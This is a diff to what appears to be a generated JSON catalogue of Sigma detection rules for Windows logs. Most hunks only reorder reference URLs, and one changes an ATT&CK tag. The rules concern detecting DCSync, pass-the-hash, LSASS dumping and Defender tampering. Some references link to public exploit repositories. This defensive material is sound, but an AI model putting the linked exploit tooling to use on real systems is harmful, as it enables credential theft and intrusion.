"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ @@ -8871,9 +8871,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], @@ -8907,9 +8907,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://adsecurity.org/?p=3466", "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ @@ -8977,8 +8977,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" ], "tags": [ @@ -9012,9 +9012,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ @@ -9099,10 +9099,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ @@ -9136,8 +9136,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ @@ -9173,8 +9173,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1490608838701166596", "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", "https://www.x86matthew.com/view_post?id=create_svc_rpc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], @@ -9241,9 +9241,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://twitter.com/malmoeb/status/1511760068743766026", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ @@ -9413,9 +9413,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" ], "tags": [ @@ -9507,8 +9507,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", + "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" ], "tags": [ @@ -9643,11 +9643,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.cisecurity.org/controls/cis-controls-list/", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" ], "tags": [ @@ -9714,8 +9714,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml" ], "tags": [ @@ -9750,11 +9750,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" ], "tags": [ @@ -9891,8 +9891,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", + "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" ], "tags": [ @@ -9976,10 +9976,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" ], @@ -10129,8 +10129,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://goo.gl/PsqrhT", "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ @@ -10257,10 +10257,10 @@ "logsource.product": "windows", "refs": [ "https://nullsec.us/windows-event-log-audit-cve/", - "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://twitter.com/DidierStevens/status/1217533958096924676", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" ], "tags": [ @@ -10372,8 +10372,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml" ], "tags": [ @@ -10414,8 +10414,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml" ], "tags": [ @@ -10456,9 +10456,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -10687,7 +10687,7 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218", "attack.t1218.007" ] @@ -10922,8 +10922,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" ], @@ -11104,9 +11104,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" ], "tags": [ @@ -11129,9 +11129,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" ], "tags": [ @@ -11154,9 +11154,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" ], "tags": [ @@ -11179,10 +11179,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" ], "tags": [ @@ -11205,9 +11205,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" ], "tags": [ @@ -11230,9 +11230,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" ], "tags": [ @@ -11255,9 +11255,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" ], "tags": [ @@ -11280,9 +11280,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", "https://twitter.com/wdormann/status/1590434950335320065", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml" ], "tags": [ @@ -11315,9 +11315,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" ], "tags": [ @@ -11350,9 +11350,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", - "Internal Research", "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" ], "tags": [ @@ -11375,9 +11375,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/hhlxf/PrintNightmare", "https://github.com/afwu/PrintNightmare", "https://twitter.com/KevTheHermit/status/1410203844064301056", - "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" ], "tags": [ @@ -11433,11 +11433,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://winaero.com/enable-openssh-server-windows-10/", "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", - "https://winaero.com/enable-openssh-server-windows-10/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ @@ -11470,9 +11470,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", - "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" ], "tags": [ @@ -11520,8 +11520,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" ], "tags": [ @@ -11588,9 +11588,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml" ], "tags": [ @@ -11623,8 +11623,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml" ], @@ -11658,8 +11658,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml" ], @@ -11760,9 +11760,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "Internal Research", "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346", - "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml" ], "tags": [ @@ -11795,8 +11795,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ @@ -11819,8 +11819,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml" ], @@ -11854,8 +11854,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml" ], "tags": [ @@ -11921,8 +11921,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ @@ -12098,8 +12098,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" ], "tags": [ @@ -12201,10 +12201,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml" ], "tags": [ @@ -12272,10 +12272,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" ], "tags": [ @@ -12342,8 +12342,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://ngrok.com/", "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ @@ -12409,8 +12409,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" ], @@ -12602,9 +12602,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", "https://twitter.com/wdormann/status/1347958161609809921", "https://twitter.com/jonasLyk/status/1347900440000811010", - "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" ], "tags": [ @@ -12737,9 +12737,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60", "https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296", "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", - "https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml" ], "tags": [ @@ -13224,9 +13224,9 @@ 